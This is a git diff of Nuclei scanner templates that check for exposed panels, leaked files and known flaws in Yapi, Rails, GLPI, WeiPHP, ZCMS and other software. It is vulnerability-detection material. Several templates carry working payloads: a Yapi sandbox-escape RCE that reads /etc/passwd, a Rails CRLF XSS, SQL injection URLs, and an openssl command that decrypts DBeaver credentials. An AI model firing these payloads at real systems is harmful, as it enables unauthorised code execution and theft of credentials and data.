- description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
+ description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
reference:
- https://www.secpulse.com/archives/162502.html
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
- https://twitter.com/sec715/status/1415484190561161216
- https://github.com/YMFE/yapi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
tags: yapi,rce
-
requests:
- raw:
- | # REQUEST 1
@@ -19,42 +21,35 @@ requests:
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
- {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
-
+ {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"}
- | # REQUEST 2
GET /api/group/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json, text/plain, */*
-
- | # REQUEST 3
POST /api/project/add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
-
- | # REQUEST 4
GET /api/project/get?id={{project_id}} HTTP/1.1
Host: {{Hostname}}
-
- | # REQUEST 5
POST /api/interface/add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
-
- | # REQUEST 6
POST /api/plugin/advmock/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
-
- | # REQUEST 7
GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
Host: {{Hostname}}
-
cookie-reuse: true
extractors:
- type: regex
@@ -64,7 +59,6 @@ requests:
part: body
regex:
- '"_id":([0-9]+),"group_name"'
-
- type: regex
name: interface_id
group: 1
@@ -72,7 +66,6 @@ requests:
part: body
regex:
- '"req_body_form":\[\],"_id":([0-9]+)'
-
- type: regex
name: project_id
group: 1
@@ -80,14 +73,14 @@ requests:
part: body
regex:
- '"tag":\[\],"_id":([0-9]+)'
-
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
-
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/poc/ruby/grails-database-admin-console-7822.yaml b/poc/ruby/grails-database-admin-console-7822.yaml
index d2aaaaddb9..f2ed34b32f 100644
--- a/poc/ruby/grails-database-admin-console-7822.yaml
+++ b/poc/ruby/grails-database-admin-console-7822.yaml
@@ -13,13 +13,7 @@ requests:
- '{{BaseURL}}/dbconsole/'
- '{{BaseURL}}/h2-console/'
- matchers-condition: and
matchers:
- type: word
words:
- "H2 Console"
-
- - type: word
- words:
- - "Sorry, remote connections ('webAllowOthers') are disabled on this server"
- negative: true
diff --git a/poc/ruby/rails6-xss-9800.yaml b/poc/ruby/rails6-xss-9800.yaml
index 184c779cfa..7991dd37b2 100644
--- a/poc/ruby/rails6-xss-9800.yaml
+++ b/poc/ruby/rails6-xss-9800.yaml
@@ -1,20 +1,22 @@
id: rails6-xss
-# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1);
-# Nuclei has issues with 302 response missing a Location header thus the
-# extended payload to make Nuclei work.
-# Working poc by @Mad-robot
-# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29
info:
name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
author: ooooooo_q,rootxharsh,iamnoooob
severity: medium
- reference:
- - https://hackerone.com/reports/904059
+ reference: https://hackerone.com/reports/904059
tags: rails,xss,crlf
+
+ # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1);
+ # Nuclei has issues with 302 response missing a Location header thus the
+ # extended payload to make Nuclei work.
+ # Working poc by @Mad-robot
+ # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29
+
requests:
- method: POST
path:
- "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa"
+
matchers-condition: and
matchers:
- type: word
diff --git a/poc/samba/samba-config-9987.yaml b/poc/samba/samba-config-9987.yaml
index b62e399c6a..15e05034c0 100644
--- a/poc/samba/samba-config-9987.yaml
+++ b/poc/samba/samba-config-9987.yaml
@@ -1,13 +1,16 @@
id: samba-config
+
info:
name: Samba config file disclosure
author: sheikhrishad
severity: info
tags: config,exposure,smb,samba
+
requests:
- method: GET
path:
- "{{BaseURL}}/smb.conf"
+
matchers-condition: and
matchers:
- type: word
@@ -15,6 +18,7 @@ requests:
- "configuration file"
- "samba"
condition: and
+
- type: status
status:
- 200
diff --git a/poc/samba/samba-detect-9988.yaml b/poc/samba/samba-detect-9988.yaml
index 1bd21fd9d7..433010b743 100644
--- a/poc/samba/samba-detect-9988.yaml
+++ b/poc/samba/samba-detect-9988.yaml
@@ -1,15 +1,8 @@
id: samba-detection
info:
- name: Samba Detection
+ name: samba detection
author: pussycat0x
severity: info
- description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily.
- reference:
- - https://www.samba.org/samba/what_is_samba.html
- - https://www.samba.org/samba/history/security.html
- classification:
- cwe-id: CWE-200
- remediation: Always apply the latest security patch.
tags: network,smb,samba
network:
- inputs:
@@ -22,4 +15,3 @@ network:
- type: word
words:
- "SMBr"
-# Enhanced by mp on 2022/02/09
diff --git a/poc/sap/sap-hana-xsengine-panel-10037.yaml b/poc/sap/sap-hana-xsengine-panel-10037.yaml
index 11aec1ad6b..fbd5d438be 100644
--- a/poc/sap/sap-hana-xsengine-panel-10037.yaml
+++ b/poc/sap/sap-hana-xsengine-panel-10037.yaml
@@ -1,9 +1,11 @@
id: sap-hana-xsengine-panel
+
info:
name: SAP HANA XSEngine Admin Panel
author: PR3R00T
severity: info
tags: panel,sap
+
requests:
- method: GET
path:
diff --git a/poc/sap/sap-netweaver-detect-10044.yaml b/poc/sap/sap-netweaver-detect-10044.yaml
index edbd2eaef5..9fe826a6f5 100644
--- a/poc/sap/sap-netweaver-detect-10044.yaml
+++ b/poc/sap/sap-netweaver-detect-10044.yaml
@@ -1,14 +1,17 @@
id: sap-netweaver-detect
+
info:
name: SAP NetWeaver ICM Detection
author: randomstr1ng
- severity: info
description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF)
+ severity: info
tags: sap,webserver
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
redirects: true
max-redirects: 2
matchers:
@@ -19,6 +22,7 @@ requests:
- "Sap-Server:"
- "SAP NetWeaver Application Server"
condition: or
+
extractors:
- type: kval
part: header
diff --git a/poc/sap/sap-redirect-10066.yaml b/poc/sap/sap-redirect-10066.yaml
index 906e0b928c..6b87d06067 100644
--- a/poc/sap/sap-redirect-10066.yaml
+++ b/poc/sap/sap-redirect-10066.yaml
@@ -1,25 +1,19 @@
id: sap-redirect
-
info:
name: SAP wide open redirect
author: Gal Nagli
severity: medium
description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice.
tags: redirect,sap
-
requests:
- method: GET
-
path:
- "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com"
-
matchers-condition: and
matchers:
-
- type: status
status:
- 302
-
- type: word
words:
- "Location: https://www.example.com"
diff --git a/poc/search/elasticsearch-sql-client-detect.yaml b/poc/search/elasticsearch-sql-client-detect.yaml
index e075189456..b6efdc2579 100644
--- a/poc/search/elasticsearch-sql-client-detect.yaml
+++ b/poc/search/elasticsearch-sql-client-detect.yaml
@@ -1,23 +1,24 @@
-id: elasticsearch-sql-client-detect
-info:
- name: Elasticsearch SQL Client Detect
- author: pussycat0x
- severity: low
- reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
- tags: elasticsearch,tech,sql
+id: elasticsearch-sql-client-detect
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
+info:
+ name: Elasticsearch SQL Client Detect
+ author: pussycat0x
+ severity: low
+ reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
+ tags: elasticsearch,tech,sql
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Elasticsearch-sql client'
- part: body
-
- - type: status
- status:
- - 200
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Elasticsearch-sql client'
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/search/searchbar.yaml b/poc/search/searchbar.yaml
index 3a8c512bf2..8cec0f7063 100644
--- a/poc/search/searchbar.yaml
+++ b/poc/search/searchbar.yaml
@@ -2,7 +2,7 @@ id: search-field
info:
name: Search Field Detection Template
- author: nithissh
+ author: foulenzer
severity: info
description: Searches Response body for input-tag and id= or name=
tags: search,input
@@ -39,4 +39,4 @@ requests:
- type: word
words:
- - 'nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
+
matchers:
- type: word
part: body
diff --git a/poc/sql/Arcms-json_newslist-sqli.yaml b/poc/sql/Arcms-json_newslist-sqli.yaml
old mode 100755
new mode 100644
diff --git a/poc/sql/BlueCMS_v1-adjs-sqli.yaml b/poc/sql/BlueCMS_v1-adjs-sqli.yaml
old mode 100755
new mode 100644
diff --git a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml
index e7c97f72d9..98a2a439f1 100644
--- a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml
+++ b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml
@@ -1,30 +1,25 @@
----
-id: GLPI_SQL_Injection
-
-info:
- author: RedTeamBrasil
- description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
- name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
- reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
- severity: high
- tags: "glpi,cve,sqli"
-
-requests:
- -
- matchers:
- -
- part: body
- type: word
- words:
- - "-MariaDB-"
- max-redirects: 3
- method: GET
- path:
- - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- redirects: true
- extractors:
- - type: regex
- part: body
- regex:
- - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
\ No newline at end of file
+id: GLPI_SQL_Injection
+info:
+ author: RedTeamBrasil
+ description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
+ reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
+ severity: high
+ tags: "glpi,cve,sqli"
+requests:
+ - matchers:
+ - part: body
+ type: word
+ words:
+ - "-MariaDB-"
+ max-redirects: 3
+ method: GET
+ path:
+ - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ redirects: true
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
diff --git a/poc/sql/Maticsoft-Shop-sqli.yaml b/poc/sql/Maticsoft-Shop-sqli.yaml
index 4a87f191a9..06e83a6789 100644
--- a/poc/sql/Maticsoft-Shop-sqli.yaml
+++ b/poc/sql/Maticsoft-Shop-sqli.yaml
@@ -1,16 +1,13 @@
id: Maticsoft-Shop-sqli
-
info:
name: Maticsoft-Shop商城CategoryId参数SQL注入
author: Str1am
severity: high
tags: Maticsoft,sqli
-
requests:
- method: GET
path:
- "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version"
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql/api-abuseipdb.yaml b/poc/sql/api-abuseipdb.yaml
index 077084fa93..ca83d86700 100644
--- a/poc/sql/api-abuseipdb.yaml
+++ b/poc/sql/api-abuseipdb.yaml
@@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://docs.abuseipdb.com/
- - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
tags: token-spray,abuseipdb
self-contained: true
diff --git a/poc/sql/couchdb-exposure-1239.yaml b/poc/sql/couchdb-exposure-1239.yaml
index 83e4c2e185..376f2370b6 100644
--- a/poc/sql/couchdb-exposure-1239.yaml
+++ b/poc/sql/couchdb-exposure-1239.yaml
@@ -3,13 +3,14 @@ info:
name: couchdb exposure
author: organiccrap
severity: low
- tags: panel,couchdb
+ tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/_all_dbs'
-
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql/database-error-6771.yaml b/poc/sql/database-error-6771.yaml
index ebdcaa6c55..7dce3ae9f0 100644
--- a/poc/sql/database-error-6771.yaml
+++ b/poc/sql/database-error-6771.yaml
@@ -3,8 +3,7 @@ info:
name: Database Error
author: dhiyaneshDK
severity: info
- metadata:
- shodan-query: http.title:"Database Error"
+ reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22
tags: misconfig,database
requests:
- method: GET
diff --git a/poc/sql/db-schema.yaml b/poc/sql/db-schema.yaml
index 9683a57871..116072e8c2 100644
--- a/poc/sql/db-schema.yaml
+++ b/poc/sql/db-schema.yaml
@@ -2,10 +2,9 @@ id: db-schema
info:
name: Discover db schema files
+ description: This file is auto-generated from the current state of the database.
author: geeknik
severity: info
- description: This file is auto-generated from the current state of the database.
- tags: exposure,backup
requests:
- method: GET
@@ -16,20 +15,22 @@ requests:
matchers-condition: and
matchers:
-
- type: word
words:
- "This file is auto-generated from the current state of the database."
- "ActiveRecord::Schema.define"
condition: and
-
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ negative: true
- type: status
status:
- 200
-
extractors:
- type: regex
name: version
part: body
regex:
- - 'eRecord::Schema\.define\(version: ([0-9_]+)\) do'
+ - 'version: \d{14}'
diff --git a/poc/sql/dbeaver-credentials.yaml b/poc/sql/dbeaver-credentials.yaml
index 28f5ad1e84..e9e66f7357 100644
--- a/poc/sql/dbeaver-credentials.yaml
+++ b/poc/sql/dbeaver-credentials.yaml
@@ -1,28 +1,26 @@
id: dbeaver-credentials
+
info:
name: DBeaver Credential Exposure
author: geeknik
- severity: high
- tags: exposure,dbeaver
+ severity: info
+
requests:
- method: GET
path:
- "{{BaseURL}}/.dbeaver/credentials-config.json"
- # To decode the credentials file, use following command:
+ # to decode the above file, run this:
# openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null
+
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
- part: header
words:
- "application/octet-stream"
+ part: header
- type: dsl
dsl:
- - 'len(body) > 2'
- - type: dsl
- dsl:
- - "!contains(tolower(body), '=200 && len(body) <400"
diff --git a/poc/sql/elasticsearch-sql-client-detect.yaml b/poc/sql/elasticsearch-sql-client-detect.yaml
index e075189456..b6efdc2579 100644
--- a/poc/sql/elasticsearch-sql-client-detect.yaml
+++ b/poc/sql/elasticsearch-sql-client-detect.yaml
@@ -1,23 +1,24 @@
-id: elasticsearch-sql-client-detect
-info:
- name: Elasticsearch SQL Client Detect
- author: pussycat0x
- severity: low
- reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
- tags: elasticsearch,tech,sql
+id: elasticsearch-sql-client-detect
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
+info:
+ name: Elasticsearch SQL Client Detect
+ author: pussycat0x
+ severity: low
+ reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
+ tags: elasticsearch,tech,sql
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Elasticsearch-sql client'
- part: body
-
- - type: status
- status:
- - 200
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Elasticsearch-sql client'
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/sql/exposed-adb-7280.yaml b/poc/sql/exposed-adb-7280.yaml
index e0a43b6ba2..26f932d53d 100644
--- a/poc/sql/exposed-adb-7280.yaml
+++ b/poc/sql/exposed-adb-7280.yaml
@@ -1,22 +1,33 @@
id: expsoed-adb
+
info:
name: Exposed Android Debug Bridge
author: pdteam,pikpikcu
severity: critical
+ description: An exposed Android debug bridge was discovered.
+ reference:
+ - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20
+ - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
+ - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/
tags: network,adb,rce,android
- reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
+
network:
- inputs:
- - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint
+ - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint
type: hex
+
- data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73"
type: hex
+
host:
- "{{Hostname}}"
- "{{Host}}:5555"
+
matchers:
- type: word
words:
- "device"
- "product"
condition: and
+
+# Enhanced by mp on 2022/03/21
diff --git a/poc/sql/exposed-sqlite-manager-7350.yaml b/poc/sql/exposed-sqlite-manager-7350.yaml
index a76ba9d93d..cff80e3ad5 100644
--- a/poc/sql/exposed-sqlite-manager-7350.yaml
+++ b/poc/sql/exposed-sqlite-manager-7350.yaml
@@ -1,18 +1,15 @@
id: exposed-sqlite-manager
-
info:
name: SQLiteManager
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/5003
tags: sqlite
-
requests:
- method: GET
path:
- '{{BaseURL}}/sqlite/'
- '{{BaseURL}}/sqlitemanager/'
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql/grails-database-admin-console-7822.yaml b/poc/sql/grails-database-admin-console-7822.yaml
index d2aaaaddb9..f2ed34b32f 100644
--- a/poc/sql/grails-database-admin-console-7822.yaml
+++ b/poc/sql/grails-database-admin-console-7822.yaml
@@ -13,13 +13,7 @@ requests:
- '{{BaseURL}}/dbconsole/'
- '{{BaseURL}}/h2-console/'
- matchers-condition: and
matchers:
- type: word
words:
- "H2 Console"
-
- - type: word
- words:
- - "Sorry, remote connections ('webAllowOthers') are disabled on this server"
- negative: true
diff --git a/poc/sql/mongodb-ops-manager-8922.yaml b/poc/sql/mongodb-ops-manager-8922.yaml
index 83b2f801c5..17f1155c95 100644
--- a/poc/sql/mongodb-ops-manager-8922.yaml
+++ b/poc/sql/mongodb-ops-manager-8922.yaml
@@ -1,17 +1,15 @@
id: mongodb-ops-manager
-
info:
name: MongoDB Ops Manager
author: dhiyaneshDK
severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22
tags: panel,mongodb
-
requests:
- method: GET
path:
- '{{BaseURL}}/account/login'
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql/mongodb-unauth-8926.yaml b/poc/sql/mongodb-unauth-8926.yaml
index 385b2f7ca3..469fd95eb9 100644
--- a/poc/sql/mongodb-unauth-8926.yaml
+++ b/poc/sql/mongodb-unauth-8926.yaml
@@ -3,11 +3,7 @@ info:
name: Unauth MongoDB Disclosure
author: pdteam
severity: high
- reference:
- - https://github.com/orleven/Tentacle
- - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
- - https://www.mongodb.com/features/mongodb-authentication
- remediation: Enable Authentication in MongoDB
+ reference: https://github.com/orleven/Tentacle
tags: network,mongodb,unauth
network:
- inputs:
diff --git a/poc/sql/odoo-database-manager.yaml b/poc/sql/odoo-database-manager.yaml
index 65c23b363a..3031253bbe 100644
--- a/poc/sql/odoo-database-manager.yaml
+++ b/poc/sql/odoo-database-manager.yaml
@@ -1,14 +1,16 @@
id: odoo-database-manager
+
info:
- name: Odoo - Database Manager Discovery
+ name: Odoo-Database-Manager
author: __Fazal,R3dg33k
severity: high
- description: Odoo database manager was discovered.
tags: panel,odoo
+
requests:
- method: GET
path:
- '{{BaseURL}}/web/database/manager'
+
matchers-condition: and
matchers:
- type: status
@@ -19,5 +21,3 @@ requests:
- "Odoo"
- "{ action: 'database_manager' }"
condition: and
-
-# Enhanced by mp on 2022/07/15
diff --git a/poc/sql/oracle-dbcs-9355.yaml b/poc/sql/oracle-dbcs-9355.yaml
index 4dd45891c6..29a3ed7ae9 100644
--- a/poc/sql/oracle-dbcs-9355.yaml
+++ b/poc/sql/oracle-dbcs-9355.yaml
@@ -1,23 +1,20 @@
-id: oracle-dbcs
-info:
- name: Oracle Database as a Service
- author: pussycat0x
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22
- tags: oracle,tech
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Oracle Database as a Service'
- part: body
-
- - type: status
- status:
- - 200
+id: oracle-dbcs
+info:
+ name: Oracle Database as a Service
+ author: pussycat0x
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22
+ tags: oracle,tech
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Oracle Database as a Service'
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/sql/sql-dump-10497.yaml b/poc/sql/sql-dump-10497.yaml
index 05e97713ac..0bf0d2bcb0 100644
--- a/poc/sql/sql-dump-10497.yaml
+++ b/poc/sql/sql-dump-10497.yaml
@@ -1,9 +1,11 @@
id: default-sql-dump
+
info:
name: MySQL Dump Files
- author: geeknik & @dwisiswant0
+ author: geeknik,dwisiswant0
severity: medium
- tags: exposure,backup
+ tags: exposure,backup,mysql
+
requests:
- method: GET
path:
@@ -28,6 +30,7 @@ requests:
- "{{BaseURL}}/wp-content/uploads/dump.sql"
headers:
Range: "bytes=0-3000"
+
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
@@ -35,6 +38,7 @@ requests:
regex:
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
part: body
+
- type: status
status:
- 200
diff --git a/poc/sql/sqliheader.yaml b/poc/sql/sqliheader.yaml
index 832a9fc156..012bac2af3 100644
--- a/poc/sql/sqliheader.yaml
+++ b/poc/sql/sqliheader.yaml
@@ -1,8 +1,10 @@
id: header-sqli
+
info:
name: Request header based sqli
- author: panch0r3d
+ author: nithissh
severity: high
+
requests:
- method: GET
path:
diff --git a/poc/sql/thumbs-db-disclosure-10763.yaml b/poc/sql/thumbs-db-disclosure-10763.yaml
index b5ee7b65d9..728de9d555 100644
--- a/poc/sql/thumbs-db-disclosure-10763.yaml
+++ b/poc/sql/thumbs-db-disclosure-10763.yaml
@@ -1,12 +1,11 @@
id: thumbs-db-disclosure
-
info:
name: Thumbs DB Disclosure
author: dhiyaneshDk
severity: info
- reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json
+ reference:
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json
tags: exposure,files
-
requests:
- method: GET
path:
@@ -17,7 +16,6 @@ requests:
binary:
- 'D0CF11E0A1B11AE1'
part: body
-
- type: status
status:
- 200
diff --git a/poc/sql/weiphp-sql-injection.yaml b/poc/sql/weiphp-sql-injection.yaml
index 8b0c9a5a1a..2b57dda7f7 100644
--- a/poc/sql/weiphp-sql-injection.yaml
+++ b/poc/sql/weiphp-sql-injection.yaml
@@ -1,24 +1,28 @@
id: weiphp-sql-injection
+
info:
name: WeiPHP 5.0 SQLI
author: pikpikcu
severity: high
- reference:
- - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
- metadata:
- verified: true
- shodan-query: http.html:"WeiPHP5.0"
+ reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
tags: weiphp,sql
+
requests:
- method: POST
path:
- "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
matchers-condition: and
matchers:
+
- type: word
- part: body
words:
- "52c69e3a57331081823331c4e69d3f2"
+ part: body
+ condition: and
+
- type: status
status:
- 500
diff --git a/poc/sql/wordpress-db-repair-11254.yaml b/poc/sql/wordpress-db-repair-11254.yaml
index 3b9b5fb05f..7c9d635e19 100644
--- a/poc/sql/wordpress-db-repair-11254.yaml
+++ b/poc/sql/wordpress-db-repair-11254.yaml
@@ -1,20 +1,24 @@
id: wordpress-db-repair
+
info:
name: Wordpress DB Repair Exposed
author: _C0wb0y_
severity: low
description: Discover enabled Wordpress repair page.
tags: wordpress,config,fpd
+
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/maint/repair.php"
+
matchers-condition: and
matchers:
- type: word
words:
- "WordPress"
+
- type: word
words:
- "define('WP_ALLOW_REPAIR', true);"
- negative: true
+ negative: true
\ No newline at end of file
diff --git a/poc/sql/wordpress-tmm-db-migrate-11317.yaml b/poc/sql/wordpress-tmm-db-migrate-11317.yaml
index d33b95d124..8e6ffbf93e 100644
--- a/poc/sql/wordpress-tmm-db-migrate-11317.yaml
+++ b/poc/sql/wordpress-tmm-db-migrate-11317.yaml
@@ -3,7 +3,7 @@ info:
name: WordPress ThemeMarkers DB Migration File
author: dwisiswant0
severity: info
- tags: wordpress,wp-plugin,backup
+ tags: wordpress,wp-plugin,backups
requests:
- method: GET
path:
diff --git a/poc/sql/wuzhicms-sqli-11658.yaml b/poc/sql/wuzhicms-sqli-11658.yaml
index fbb326fda5..b972d9a3d9 100644
--- a/poc/sql/wuzhicms-sqli-11658.yaml
+++ b/poc/sql/wuzhicms-sqli-11658.yaml
@@ -5,6 +5,7 @@ info:
severity: high
reference: https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
+
requests:
- method: GET
path:
diff --git a/poc/sql/zcms-v3-sqli.yaml b/poc/sql/zcms-v3-sqli.yaml
index a7084a23d3..ed56b88314 100644
--- a/poc/sql/zcms-v3-sqli.yaml
+++ b/poc/sql/zcms-v3-sqli.yaml
@@ -6,18 +6,16 @@ info:
reference:
- https://www.anquanke.com/post/id/183241
tags: zcms,sqli
-variables:
- num: "999999999"
requests:
- method: GET
path:
- - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
+ - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- - type: word
- words:
- - '{{md5({{num}})}}'
- part: body
- type: status
status:
- 200
+ - type: word
+ words:
+ - "6f7c6dcbc380aac3bcba1f9fccec991e"
+ part: body
diff --git a/poc/sql_injection/74cms-sqli-8.yaml b/poc/sql_injection/74cms-sqli-8.yaml
index 64afb3631a..afd5c1aac4 100644
